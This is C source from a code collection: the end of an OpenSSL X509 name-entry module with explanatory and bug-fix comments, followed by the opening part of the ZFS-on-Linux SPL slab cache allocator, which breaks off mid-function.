	data = X509_NAME_ENTRY_get_data(X509_NAME_get_entry(name, i));
	if (buf == NULL)
		return data->length;	/* query mode: report required length */
	/*
	 * BUG FIX: with len <= 0 the original computed i = len - 1 (negative)
	 * and handed it to memcpy(), where it became a huge size_t and
	 * overran the buffer.  Report "nothing copied" instead.
	 */
	if (len <= 0)
		return 0;
	i = (data->length > (len - 1)) ? (len - 1) : data->length;
	memcpy(buf, data->data, i);
	buf[i] = '\0';
	return i;
}
/* Number of entries in the name; 0 for a NULL name. */
int X509_NAME_entry_count(X509_NAME *name)
{
	return (name == NULL) ? 0 : sk_X509_NAME_ENTRY_num(name->entries);
}
/*
 * Find the next entry matching 'nid' after index 'lastpos'.
 * Returns -2 when the NID itself is unknown (distinct from -1 = not found).
 */
int X509_NAME_get_index_by_NID(X509_NAME *name, int nid, int lastpos)
{
	ASN1_OBJECT *obj = OBJ_nid2obj(nid);

	if (obj == NULL)
		return -2;
	return X509_NAME_get_index_by_OBJ(name, obj, lastpos);
}
/* NOTE: you should be passsing -1, not 0 as lastpos */
/* NOTE: you should be passsing -1, not 0 as lastpos */
int X509_NAME_get_index_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
	     int lastpos)
{
	int idx, total;
	STACK_OF(X509_NAME_ENTRY) *entries;

	if (name == NULL)
		return -1;
	entries = name->entries;
	total = sk_X509_NAME_ENTRY_num(entries);
	/* Resume scanning one past the previous hit (callers pass -1 first). */
	for (idx = (lastpos < 0) ? 0 : lastpos + 1; idx < total; idx++) {
		X509_NAME_ENTRY *entry =
		    sk_X509_NAME_ENTRY_value(entries, idx);

		if (OBJ_cmp(entry->object, obj) == 0)
			return idx;
	}
	return -1;
}
/* Bounds-checked entry accessor; NULL for any out-of-range index. */
X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc)
{
	if (name == NULL || loc < 0 ||
	    sk_X509_NAME_ENTRY_num(name->entries) <= loc)
		return NULL;
	return sk_X509_NAME_ENTRY_value(name->entries, loc);
}
/*
 * Remove and return the entry at index 'loc' (caller owns the returned
 * entry and must free it).  If deleting the entry merged two adjacent RDN
 * sets, the set numbers of all following entries are decremented to keep
 * the sequence consistent.  Returns NULL on a NULL name or bad index.
 */
X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc)
{
X509_NAME_ENTRY *ret;
int i,n,set_prev,set_next;
STACK_OF(X509_NAME_ENTRY) *sk;
if (name == NULL || sk_X509_NAME_ENTRY_num(name->entries) <= loc
|| loc < 0)
return(NULL);
sk=name->entries;
ret=sk_X509_NAME_ENTRY_delete(sk,loc);
n=sk_X509_NAME_ENTRY_num(sk);
/* cached DER encoding is now stale */
name->modified=1;
/* deleted the last entry: no set numbers after it to repair */
if (loc == n) return(ret);
/* else we need to fixup the set field */
if (loc != 0)
set_prev=(sk_X509_NAME_ENTRY_value(sk,loc-1))->set;
else
set_prev=ret->set-1;
set_next=sk_X509_NAME_ENTRY_value(sk,loc)->set;
/* set_prev is the previous set
 * set is the current set
 * set_next is the following
 * prev 1 1 1 1 1 1 1 1
 * set 1 1 2 2
 * next 1 1 2 2 2 2 3 2
 * so basically only if prev and next differ by 2, then
 * re-number down by 1 */
if (set_prev+1 < set_next)
for (i=loc; i<n; i++)
sk_X509_NAME_ENTRY_value(sk,i)->set--;
return(ret);
}
/*
 * Convenience wrapper: build a temporary entry from an ASN1 object, add a
 * copy of it to the name, then discard the temporary.  Returns 1/0.
 */
int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
	    unsigned char *bytes, int len, int loc, int set)
{
	int added = 0;
	X509_NAME_ENTRY *entry =
	    X509_NAME_ENTRY_create_by_OBJ(NULL, obj, type, bytes, len);

	if (entry != NULL) {
		/* X509_NAME_add_entry duplicates the entry internally */
		added = X509_NAME_add_entry(name, entry, loc, set);
		X509_NAME_ENTRY_free(entry);
	}
	return added;
}
/*
 * Convenience wrapper: build a temporary entry from a NID, add a copy of
 * it to the name, then discard the temporary.  Returns 1/0.
 */
int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
	    unsigned char *bytes, int len, int loc, int set)
{
	int added = 0;
	X509_NAME_ENTRY *entry =
	    X509_NAME_ENTRY_create_by_NID(NULL, nid, type, bytes, len);

	if (entry != NULL) {
		/* X509_NAME_add_entry duplicates the entry internally */
		added = X509_NAME_add_entry(name, entry, loc, set);
		X509_NAME_ENTRY_free(entry);
	}
	return added;
}
/*
 * Convenience wrapper: build a temporary entry from a textual field name,
 * add a copy of it to the name, then discard the temporary.  Returns 1/0.
 */
int X509_NAME_add_entry_by_txt(X509_NAME *name, char *field, int type,
	    unsigned char *bytes, int len, int loc, int set)
{
	int added = 0;
	X509_NAME_ENTRY *entry =
	    X509_NAME_ENTRY_create_by_txt(NULL, field, type, bytes, len);

	if (entry != NULL) {
		/* X509_NAME_add_entry duplicates the entry internally */
		added = X509_NAME_add_entry(name, entry, loc, set);
		X509_NAME_ENTRY_free(entry);
	}
	return added;
}
/* if set is -1, append to previous set, 0 'a new one', and 1,
 * prepend to the guy we are about to stomp on. */
int X509_NAME_add_entry(X509_NAME *name, X509_NAME_ENTRY *ne, int loc,
	     int set)
{
	X509_NAME_ENTRY *new_name = NULL;
	int n, i, inc;
	STACK_OF(X509_NAME_ENTRY) *sk;

	if (name == NULL)
		return 0;
	sk = name->entries;
	n = sk_X509_NAME_ENTRY_num(sk);
	if (loc > n || loc < 0)
		loc = n;		/* out of range means append */
	name->modified = 1;	/* cached DER encoding is now stale */

	if (set == -1) {
		/* Join the set of the preceding entry (or start set 0). */
		if (loc == 0) {
			set = 0;
			inc = 1;
		} else {
			set = sk_X509_NAME_ENTRY_value(sk, loc - 1)->set;
			inc = 0;
		}
	} else {		/* if (set >= 0) */
		if (loc >= n) {
			if (loc != 0)
				set = sk_X509_NAME_ENTRY_value(sk, loc - 1)->set + 1;
			else
				set = 0;
		} else {
			set = sk_X509_NAME_ENTRY_value(sk, loc)->set;
		}
		/* introducing a new set number shifts the later sets up */
		inc = (set == 0) ? 1 : 0;
	}

	/* insert a private copy; caller keeps ownership of 'ne' */
	if ((new_name = X509_NAME_ENTRY_dup(ne)) == NULL)
		goto err;
	new_name->set = set;
	if (!sk_X509_NAME_ENTRY_insert(sk, new_name, loc)) {
		X509err(X509_F_X509_NAME_ADD_ENTRY, ERR_R_MALLOC_FAILURE);
		goto err;
	}
	if (inc) {
		/*
		 * BUG FIX: the original loop incremented entry i-1, which
		 * renumbered the entry just inserted at 'loc' and skipped
		 * the final entry.  Bump only the entries *after* the
		 * insertion point, matching upstream OpenSSL.
		 */
		n = sk_X509_NAME_ENTRY_num(sk);
		for (i = loc + 1; i < n; i++)
			sk_X509_NAME_ENTRY_value(sk, i)->set += 1;
	}
	return 1;
err:
	if (new_name != NULL)
		X509_NAME_ENTRY_free(new_name);
	return 0;
}
/*
 * Create (or fill in *ne) an entry from a textual field name such as "CN".
 * Pushes an error with the offending field name when it cannot be mapped
 * to an ASN1 object.
 */
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
	     char *field, int type, unsigned char *bytes, int len)
{
	X509_NAME_ENTRY *entry;
	ASN1_OBJECT *obj = OBJ_txt2obj(field, 0);

	if (obj == NULL) {
		X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_TXT,
			X509_R_INVALID_FIELD_NAME);
		ERR_add_error_data(2, "name=", field);
		return NULL;
	}
	entry = X509_NAME_ENTRY_create_by_OBJ(ne, obj, type, bytes, len);
	ASN1_OBJECT_free(obj);	/* the entry holds its own duplicate */
	return entry;
}
/*
 * Create (or fill in *ne) an entry from a NID.  Pushes an error and
 * returns NULL when the NID has no registered ASN1 object.
 */
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
	     int type, unsigned char *bytes, int len)
{
	X509_NAME_ENTRY *entry;
	ASN1_OBJECT *obj = OBJ_nid2obj(nid);

	if (obj == NULL) {
		X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_NID,
			X509_R_UNKNOWN_NID);
		return NULL;
	}
	entry = X509_NAME_ENTRY_create_by_OBJ(ne, obj, type, bytes, len);
	ASN1_OBJECT_free(obj);	/* the entry holds its own duplicate */
	return entry;
}
/*
 * Create an entry from an ASN1 object and data.  Follows the OpenSSL
 * in/out convention: if ne is NULL or *ne is NULL a fresh entry is
 * allocated (and stored back through ne when possible); otherwise *ne is
 * reused in place.  On failure a freshly allocated entry is freed, but a
 * caller-supplied *ne is left intact for the caller to dispose of.
 */
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
ASN1_OBJECT *obj, int type, unsigned char *bytes, int len)
{
X509_NAME_ENTRY *ret;
if ((ne == NULL) || (*ne == NULL))
{
if ((ret=X509_NAME_ENTRY_new()) == NULL)
return(NULL);
}
else
ret= *ne;
if (!X509_NAME_ENTRY_set_object(ret,obj))
goto err;
if (!X509_NAME_ENTRY_set_data(ret,type,bytes,len))
goto err;
/* publish the new entry back through the in/out parameter */
if ((ne != NULL) && (*ne == NULL)) *ne=ret;
return(ret);
err:
/* only free entries we allocated ourselves, never the caller's */
if ((ne == NULL) || (ret != *ne))
X509_NAME_ENTRY_free(ret);
return(NULL);
}
/*
 * Replace the entry's field OID with a private copy of 'obj'.
 * Returns 1 on success, 0 on NULL arguments or duplication failure.
 */
int X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne, ASN1_OBJECT *obj)
{
	if (ne == NULL || obj == NULL) {
		X509err(X509_F_X509_NAME_ENTRY_SET_OBJECT,
			ERR_R_PASSED_NULL_PARAMETER);
		return 0;
	}
	ASN1_OBJECT_free(ne->object);	/* drop any previous object */
	ne->object = OBJ_dup(obj);
	return (ne->object != NULL) ? 1 : 0;
}
/*
 * Set the entry's value.  With an MBSTRING_* type the data is converted
 * and validated per the field's OID; otherwise the raw bytes are copied
 * (len < 0 means "treat bytes as a NUL-terminated string").  Returns 1/0.
 */
int X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
unsigned char *bytes, int len)
{
int i;
if ((ne == NULL) || ((bytes == NULL) && (len != 0))) return(0);
/* multibyte-string flag: convert according to the field's rules */
if((type > 0) && (type & MBSTRING_FLAG))
return ASN1_STRING_set_by_NID(&ne->value, bytes,
len, type,
OBJ_obj2nid(ne->object)) ? 1 : 0;
if (len < 0) len=strlen((char *)bytes);
i=ASN1_STRING_set(ne->value,bytes,len);
if (!i) return(0);
if (type != V_ASN1_UNDEF)
{
/* V_ASN1_APP_CHOOSE: pick the narrowest ASN1 string type that fits */
if (type == V_ASN1_APP_CHOOSE)
ne->value->type=ASN1_PRINTABLE_type(bytes,len);
else
ne->value->type=type;
}
return(1);
}
/* Accessor for the entry's field OID; tolerates a NULL entry. */
ASN1_OBJECT *X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne)
{
	return (ne != NULL) ? ne->object : NULL;
}
/* Accessor for the entry's value string; tolerates a NULL entry. */
ASN1_STRING *X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne)
{
	return (ne != NULL) ? ne->value : NULL;
}
| gpl-2.0 |
coldnew/linux | spl/spl/spl-kmem-cache.c | 2 | 50473 | /*
* Copyright (C) 2007-2010 Lawrence Livermore National Security, LLC.
* Copyright (C) 2007 The Regents of the University of California.
* Produced at Lawrence Livermore National Laboratory (cf, DISCLAIMER).
* Written by Brian Behlendorf <behlendorf1@llnl.gov>.
* UCRL-CODE-235197
*
* This file is part of the SPL, Solaris Porting Layer.
* For details, see <http://zfsonlinux.org/>.
*
* The SPL is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* The SPL is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* for more details.
*
* You should have received a copy of the GNU General Public License along
* with the SPL. If not, see <http://www.gnu.org/licenses/>.
*/
#include <sys/kmem.h>
#include <sys/kmem_cache.h>
#include <sys/taskq.h>
#include <sys/timer.h>
#include <sys/vmem.h>
#include <linux/slab.h>
#include <linux/swap.h>
#include <linux/mm_compat.h>
#include <linux/wait_compat.h>
/*
* Within the scope of spl-kmem.c file the kmem_cache_* definitions
* are removed to allow access to the real Linux slab allocator.
*/
#undef kmem_cache_destroy
#undef kmem_cache_create
#undef kmem_cache_alloc
#undef kmem_cache_free
/*
* Linux 3.16 replaced smp_mb__{before,after}_{atomic,clear}_{dec,inc,bit}()
* with smp_mb__{before,after}_atomic() because they were redundant. This is
* only used inside our SLAB allocator, so we implement an internal wrapper
* here to give us smp_mb__{before,after}_atomic() on older kernels.
*/
#ifndef smp_mb__before_atomic
#define smp_mb__before_atomic(x) smp_mb__before_clear_bit(x)
#endif
#ifndef smp_mb__after_atomic
#define smp_mb__after_atomic(x) smp_mb__after_clear_bit(x)
#endif
/*
* Cache expiration was implemented because it was part of the default Solaris
* kmem_cache behavior. The idea is that per-cpu objects which haven't been
* accessed in several seconds should be returned to the cache. On the other
* hand Linux slabs never move objects back to the slabs unless there is
* memory pressure on the system. By default the Linux method is enabled
* because it has been shown to improve responsiveness on low memory systems.
* This policy may be changed by setting KMC_EXPIRE_AGE or KMC_EXPIRE_MEM.
*/
unsigned int spl_kmem_cache_expire = KMC_EXPIRE_MEM;
EXPORT_SYMBOL(spl_kmem_cache_expire);
module_param(spl_kmem_cache_expire, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_expire, "By age (0x1) or low memory (0x2)");
/*
* Cache magazines are an optimization designed to minimize the cost of
* allocating memory. They do this by keeping a per-cpu cache of recently
* freed objects, which can then be reallocated without taking a lock. This
* can improve performance on highly contended caches. However, because
* objects in magazines will prevent otherwise empty slabs from being
* immediately released this may not be ideal for low memory machines.
*
* For this reason spl_kmem_cache_magazine_size can be used to set a maximum
* magazine size. When this value is set to 0 the magazine size will be
* automatically determined based on the object size. Otherwise magazines
* will be limited to 2-256 objects per magazine (i.e per cpu). Magazines
* may never be entirely disabled in this implementation.
*/
unsigned int spl_kmem_cache_magazine_size = 0;
module_param(spl_kmem_cache_magazine_size, uint, 0444);
MODULE_PARM_DESC(spl_kmem_cache_magazine_size,
"Default magazine size (2-256), set automatically (0)\n");
/*
* The default behavior is to report the number of objects remaining in the
* cache. This allows the Linux VM to repeatedly reclaim objects from the
* cache when memory is low satisfy other memory allocations. Alternately,
* setting this value to KMC_RECLAIM_ONCE limits how aggressively the cache
* is reclaimed. This may increase the likelihood of out of memory events.
*/
unsigned int spl_kmem_cache_reclaim = 0 /* KMC_RECLAIM_ONCE */;
module_param(spl_kmem_cache_reclaim, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_reclaim, "Single reclaim pass (0x1)");
unsigned int spl_kmem_cache_obj_per_slab = SPL_KMEM_CACHE_OBJ_PER_SLAB;
module_param(spl_kmem_cache_obj_per_slab, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_obj_per_slab, "Number of objects per slab");
unsigned int spl_kmem_cache_obj_per_slab_min = SPL_KMEM_CACHE_OBJ_PER_SLAB_MIN;
module_param(spl_kmem_cache_obj_per_slab_min, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_obj_per_slab_min,
"Minimal number of objects per slab");
unsigned int spl_kmem_cache_max_size = SPL_KMEM_CACHE_MAX_SIZE;
module_param(spl_kmem_cache_max_size, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_max_size, "Maximum size of slab in MB");
/*
* For small objects the Linux slab allocator should be used to make the most
* efficient use of the memory. However, large objects are not supported by
* the Linux slab and therefore the SPL implementation is preferred. A cutoff
* of 16K was determined to be optimal for architectures using 4K pages.
*/
#if PAGE_SIZE == 4096
unsigned int spl_kmem_cache_slab_limit = 16384;
#else
unsigned int spl_kmem_cache_slab_limit = 0;
#endif
module_param(spl_kmem_cache_slab_limit, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_slab_limit,
"Objects less than N bytes use the Linux slab");
/*
* This value defaults to a threshold designed to avoid allocations which
* have been deemed costly by the kernel.
*/
unsigned int spl_kmem_cache_kmem_limit =
((1 << (PAGE_ALLOC_COSTLY_ORDER - 1)) * PAGE_SIZE) /
SPL_KMEM_CACHE_OBJ_PER_SLAB;
module_param(spl_kmem_cache_kmem_limit, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_kmem_limit,
"Objects less than N bytes use the kmalloc");
/*
* The number of threads available to allocate new slabs for caches. This
* should not need to be tuned but it is available for performance analysis.
*/
unsigned int spl_kmem_cache_kmem_threads = 4;
module_param(spl_kmem_cache_kmem_threads, uint, 0444);
MODULE_PARM_DESC(spl_kmem_cache_kmem_threads,
"Number of spl_kmem_cache threads");
/*
* Slab allocation interfaces
*
* While the Linux slab implementation was inspired by the Solaris
* implementation I cannot use it to emulate the Solaris APIs. I
* require two features which are not provided by the Linux slab.
*
* 1) Constructors AND destructors. Recent versions of the Linux
* kernel have removed support for destructors. This is a deal
* breaker for the SPL which contains particularly expensive
* initializers for mutex's, condition variables, etc. We also
* require a minimal level of cleanup for these data types unlike
* many Linux data types which do need to be explicitly destroyed.
*
* 2) Virtual address space backed slab. Callers of the Solaris slab
* expect it to work well for both small are very large allocations.
* Because of memory fragmentation the Linux slab which is backed
* by kmalloc'ed memory performs very badly when confronted with
* large numbers of large allocations. Basing the slab on the
* virtual address space removes the need for contiguous pages
* and greatly improve performance for large allocations.
*
* For these reasons, the SPL has its own slab implementation with
* the needed features. It is not as highly optimized as either the
* Solaris or Linux slabs, but it should get me most of what is
* needed until it can be optimized or obsoleted by another approach.
*
* One serious concern I do have about this method is the relatively
* small virtual address space on 32bit arches. This will seriously
* constrain the size of the slab caches and their performance.
*/
struct list_head spl_kmem_cache_list; /* List of caches */
struct rw_semaphore spl_kmem_cache_sem; /* Cache list lock */
taskq_t *spl_kmem_cache_taskq; /* Task queue for ageing / reclaim */
static void spl_cache_shrink(spl_kmem_cache_t *skc, void *obj);
SPL_SHRINKER_CALLBACK_FWD_DECLARE(spl_kmem_cache_generic_shrinker);
SPL_SHRINKER_DECLARE(spl_kmem_cache_shrinker,
spl_kmem_cache_generic_shrinker, KMC_DEFAULT_SEEKS);
/*
 * Allocate backing memory for a slab.  KMC_KMEM caches use physically
 * contiguous pages (size must be a power of two); all other caches fall
 * back to virtual memory, which avoids contiguity pressure for large
 * slabs.  Either way the result is page aligned (or NULL on failure).
 */
static void *
kv_alloc(spl_kmem_cache_t *skc, int size, int flags)
{
gfp_t lflags = kmem_flags_convert(flags);
void *ptr;
if (skc->skc_flags & KMC_KMEM) {
ASSERT(ISP2(size));
ptr = (void *)__get_free_pages(lflags, get_order(size));
} else {
ptr = spl_vmalloc(size, lflags | __GFP_HIGHMEM, PAGE_KERNEL);
}
/* Resulting allocated memory will be page aligned */
ASSERT(IS_P2ALIGNED(ptr, PAGE_SIZE));
return (ptr);
}
/*
 * Release slab backing memory obtained from kv_alloc(), using the free
 * routine matching the allocation path (free_pages vs vfree).  Also
 * credits the pages to the reclaim accounting normally done inside the
 * Linux slab, since we bypass that infrastructure entirely.
 */
static void
kv_free(spl_kmem_cache_t *skc, void *ptr, int size)
{
ASSERT(IS_P2ALIGNED(ptr, PAGE_SIZE));
/*
 * The Linux direct reclaim path uses this out of band value to
 * determine if forward progress is being made. Normally this is
 * incremented by kmem_freepages() which is part of the various
 * Linux slab implementations. However, since we are using none
 * of that infrastructure we are responsible for incrementing it.
 */
if (current->reclaim_state)
current->reclaim_state->reclaimed_slab += size >> PAGE_SHIFT;
if (skc->skc_flags & KMC_KMEM) {
ASSERT(ISP2(size));
free_pages((unsigned long)ptr, get_order(size));
} else {
vfree(ptr);
}
}
/*
* Required space for each aligned sks.
*/
/* Size of the slab header, rounded up to the cache's object alignment. */
static inline uint32_t
spl_sks_size(spl_kmem_cache_t *skc)
{
return (P2ROUNDUP_TYPED(sizeof (spl_kmem_slab_t),
skc->skc_obj_align, uint32_t));
}
/*
* Required space for each aligned object.
*/
/*
 * Per-object footprint on a slab: the aligned object payload plus the
 * aligned tracking structure (spl_kmem_obj_t) that trails it.
 */
static inline uint32_t
spl_obj_size(spl_kmem_cache_t *skc)
{
uint32_t align = skc->skc_obj_align;
return (P2ROUNDUP_TYPED(skc->skc_obj_size, align, uint32_t) +
P2ROUNDUP_TYPED(sizeof (spl_kmem_obj_t), align, uint32_t));
}
/*
* Lookup the spl_kmem_object_t for an object given that object.
*/
/*
 * Locate the tracking structure for an object: it sits immediately after
 * the aligned object payload (see spl_obj_size()).  Note the arithmetic
 * on a void pointer relies on the GNU extension used throughout the kernel.
 */
static inline spl_kmem_obj_t *
spl_sko_from_obj(spl_kmem_cache_t *skc, void *obj)
{
return (obj + P2ROUNDUP_TYPED(skc->skc_obj_size,
skc->skc_obj_align, uint32_t));
}
/*
* Required space for each offslab object taking in to account alignment
* restrictions and the power-of-two requirement of kv_alloc().
*/
/*
 * Allocation size for an offslab object: the next power of two at least
 * twice the object footprint, satisfying kv_alloc()'s power-of-two
 * requirement for the KMC_KMEM path.
 */
static inline uint32_t
spl_offslab_size(spl_kmem_cache_t *skc)
{
return (1UL << (fls64(spl_obj_size(skc)) + 1));
}
/*
* It's important that we pack the spl_kmem_obj_t structure and the
* actual objects in to one large address space to minimize the number
* of calls to the allocator. It is far better to do a few large
* allocations and then subdivide it ourselves. Now which allocator
* we use requires balancing a few trade offs.
*
* For small objects we use kmem_alloc() because as long as you are
* only requesting a small number of pages (ideally just one) its cheap.
* However, when you start requesting multiple pages with kmem_alloc()
* it gets increasingly expensive since it requires contiguous pages.
* For this reason we shift to vmem_alloc() for slabs of large objects
* which removes the need for contiguous pages. We do not use
* vmem_alloc() in all cases because there is significant locking
* overhead in __get_vm_area_node(). This function takes a single
* global lock when acquiring an available virtual address range which
* serializes all vmem_alloc()'s for all slab caches. Using slightly
* different allocation functions for small and large objects should
* give us the best of both worlds.
*
* KMC_ONSLAB KMC_OFFSLAB
*
* +------------------------+ +-----------------+
* | spl_kmem_slab_t --+-+ | | spl_kmem_slab_t |---+-+
* | skc_obj_size <-+ | | +-----------------+ | |
* | spl_kmem_obj_t | | | |
* | skc_obj_size <---+ | +-----------------+ | |
* | spl_kmem_obj_t | | | skc_obj_size | <-+ |
* | ... v | | spl_kmem_obj_t | |
* +------------------------+ +-----------------+ v
*/
/*
 * Allocate and initialize a new slab for the cache.  The slab header
 * lives at the start of the base allocation; objects either follow it
 * inline (KMC_ONSLAB) or are allocated individually (KMC_OFFSLAB).  Every
 * object is linked onto the slab's free list.  On partial failure all
 * offslab objects allocated so far and the base allocation are released.
 * Returns the new slab or NULL.
 */
static spl_kmem_slab_t *
spl_slab_alloc(spl_kmem_cache_t *skc, int flags)
{
spl_kmem_slab_t *sks;
spl_kmem_obj_t *sko, *n;
void *base, *obj;
uint32_t obj_size, offslab_size = 0;
int i, rc = 0;
base = kv_alloc(skc, skc->skc_slab_size, flags);
if (base == NULL)
return (NULL);
/* slab header occupies the front of the base allocation */
sks = (spl_kmem_slab_t *)base;
sks->sks_magic = SKS_MAGIC;
sks->sks_objs = skc->skc_slab_objs;
sks->sks_age = jiffies;
sks->sks_cache = skc;
INIT_LIST_HEAD(&sks->sks_list);
INIT_LIST_HEAD(&sks->sks_free_list);
sks->sks_ref = 0;
obj_size = spl_obj_size(skc);
if (skc->skc_flags & KMC_OFFSLAB)
offslab_size = spl_offslab_size(skc);
for (i = 0; i < sks->sks_objs; i++) {
if (skc->skc_flags & KMC_OFFSLAB) {
/* each object gets its own allocation */
obj = kv_alloc(skc, offslab_size, flags);
if (!obj) {
rc = -ENOMEM;
goto out;
}
} else {
/* objects are carved out of the slab after the header */
obj = base + spl_sks_size(skc) + (i * obj_size);
}
ASSERT(IS_P2ALIGNED(obj, skc->skc_obj_align));
sko = spl_sko_from_obj(skc, obj);
sko->sko_addr = obj;
sko->sko_magic = SKO_MAGIC;
sko->sko_slab = sks;
INIT_LIST_HEAD(&sko->sko_list);
list_add_tail(&sko->sko_list, &sks->sks_free_list);
}
out:
if (rc) {
/* unwind: free any offslab objects already linked, then the slab */
if (skc->skc_flags & KMC_OFFSLAB)
list_for_each_entry_safe(sko,
n, &sks->sks_free_list, sko_list)
kv_free(skc, sko->sko_addr, offslab_size);
kv_free(skc, base, skc->skc_slab_size);
sks = NULL;
}
return (sks);
}
/*
* Remove a slab from complete or partial list, it must be called with
* the 'skc->skc_lock' held but the actual free must be performed
* outside the lock to prevent deadlocking on vmem addresses.
*/
/*
 * Remove a slab from complete or partial list, it must be called with
 * the 'skc->skc_lock' held but the actual free must be performed
 * outside the lock to prevent deadlocking on vmem addresses.
 */
static void
spl_slab_free(spl_kmem_slab_t *sks,
struct list_head *sks_list, struct list_head *sko_list)
{
spl_kmem_cache_t *skc;
ASSERT(sks->sks_magic == SKS_MAGIC);
/* only fully idle slabs may be freed */
ASSERT(sks->sks_ref == 0);
skc = sks->sks_cache;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
/*
 * Update slab/objects counters in the cache, then remove the
 * slab from the skc->skc_partial_list. Finally add the slab
 * and all its objects in to the private work lists where the
 * destructors will be called and the memory freed to the system.
 */
skc->skc_obj_total -= sks->sks_objs;
skc->skc_slab_total--;
list_del(&sks->sks_list);
list_add(&sks->sks_list, sks_list);
list_splice_init(&sks->sks_free_list, sko_list);
}
/*
* Reclaim empty slabs at the end of the partial list.
*/
/*
 * Reclaim empty slabs at the end of the partial list.
 *
 * Phase one collects idle slabs onto private lists under the cache lock;
 * phase two frees them (and any offslab objects) with the lock dropped,
 * since kv_free() may sleep.
 */
static void
spl_slab_reclaim(spl_kmem_cache_t *skc)
{
spl_kmem_slab_t *sks, *m;
spl_kmem_obj_t *sko, *n;
LIST_HEAD(sks_list);
LIST_HEAD(sko_list);
uint32_t size = 0;
/*
 * Empty slabs and objects must be moved to a private list so they
 * can be safely freed outside the spin lock. All empty slabs are
 * at the end of skc->skc_partial_list, therefore once a non-empty
 * slab is found we can stop scanning.
 */
spin_lock(&skc->skc_lock);
list_for_each_entry_safe_reverse(sks, m,
&skc->skc_partial_list, sks_list) {
if (sks->sks_ref > 0)
break;
spl_slab_free(sks, &sks_list, &sko_list);
}
spin_unlock(&skc->skc_lock);
/*
 * The following two loops ensure all the object destructors are
 * run, any offslab objects are freed, and the slabs themselves
 * are freed. This is all done outside the skc->skc_lock since
 * this allows the destructor to sleep, and allows us to perform
 * a conditional reschedule when a freeing a large number of
 * objects and slabs back to the system.
 */
if (skc->skc_flags & KMC_OFFSLAB)
size = spl_offslab_size(skc);
list_for_each_entry_safe(sko, n, &sko_list, sko_list) {
ASSERT(sko->sko_magic == SKO_MAGIC);
if (skc->skc_flags & KMC_OFFSLAB)
kv_free(skc, sko->sko_addr, size);
}
list_for_each_entry_safe(sks, m, &sks_list, sks_list) {
ASSERT(sks->sks_magic == SKS_MAGIC);
kv_free(skc, sks, skc->skc_slab_size);
}
}
/*
 * Look up the emergency-object record whose address matches 'obj' in the
 * cache's red-black tree.  Returns the record or NULL when not tracked.
 */
static spl_kmem_emergency_t *
spl_emergency_search(struct rb_root *root, void *obj)
{
	const unsigned long addr = (unsigned long)obj;
	struct rb_node *node;

	/* standard binary-search descent keyed on the object's address */
	for (node = root->rb_node; node != NULL; ) {
		spl_kmem_emergency_t *ske =
		    container_of(node, spl_kmem_emergency_t, ske_node);

		if (addr < ske->ske_obj)
			node = node->rb_left;
		else if (addr > ske->ske_obj)
			node = node->rb_right;
		else
			return (ske);
	}
	return (NULL);
}
/*
 * Insert an emergency-object record into the red-black tree keyed by its
 * address.  Returns 1 on success, 0 if an entry with the same address is
 * already present (the tree is left unchanged in that case).
 */
static int
spl_emergency_insert(struct rb_root *root, spl_kmem_emergency_t *ske)
{
struct rb_node **new = &(root->rb_node), *parent = NULL;
spl_kmem_emergency_t *ske_tmp;
unsigned long address = ske->ske_obj;
/* descend to the leaf position where the new node belongs */
while (*new) {
ske_tmp = container_of(*new, spl_kmem_emergency_t, ske_node);
parent = *new;
if (address < ske_tmp->ske_obj)
new = &((*new)->rb_left);
else if (address > ske_tmp->ske_obj)
new = &((*new)->rb_right);
else
return (0);
}
/* link in the new node, then rebalance/recolor */
rb_link_node(&ske->ske_node, parent, new);
rb_insert_color(&ske->ske_node, root);
return (1);
}
/*
* Allocate a single emergency object and track it in a red black tree.
*/
/*
 * Allocate a single emergency object and track it in a red black tree.
 * Used when a slab cannot be grown; the object comes straight from the
 * page allocator.  Returns 0 and sets *obj on success, -EEXIST when a
 * partial slab appeared in the meantime (caller should retry the normal
 * path), or a negative errno on allocation/insertion failure.
 */
static int
spl_emergency_alloc(spl_kmem_cache_t *skc, int flags, void **obj)
{
gfp_t lflags = kmem_flags_convert(flags);
spl_kmem_emergency_t *ske;
int order = get_order(skc->skc_obj_size);
int empty;
/* Last chance use a partial slab if one now exists */
spin_lock(&skc->skc_lock);
empty = list_empty(&skc->skc_partial_list);
spin_unlock(&skc->skc_lock);
if (!empty)
return (-EEXIST);
ske = kmalloc(sizeof (*ske), lflags);
if (ske == NULL)
return (-ENOMEM);
ske->ske_obj = __get_free_pages(lflags, order);
if (ske->ske_obj == 0) {
kfree(ske);
return (-ENOMEM);
}
spin_lock(&skc->skc_lock);
/* 'empty' is reused here: nonzero means the insert succeeded */
empty = spl_emergency_insert(&skc->skc_emergency_tree, ske);
if (likely(empty)) {
skc->skc_obj_total++;
skc->skc_obj_emergency++;
if (skc->skc_obj_emergency > skc->skc_obj_emergency_max)
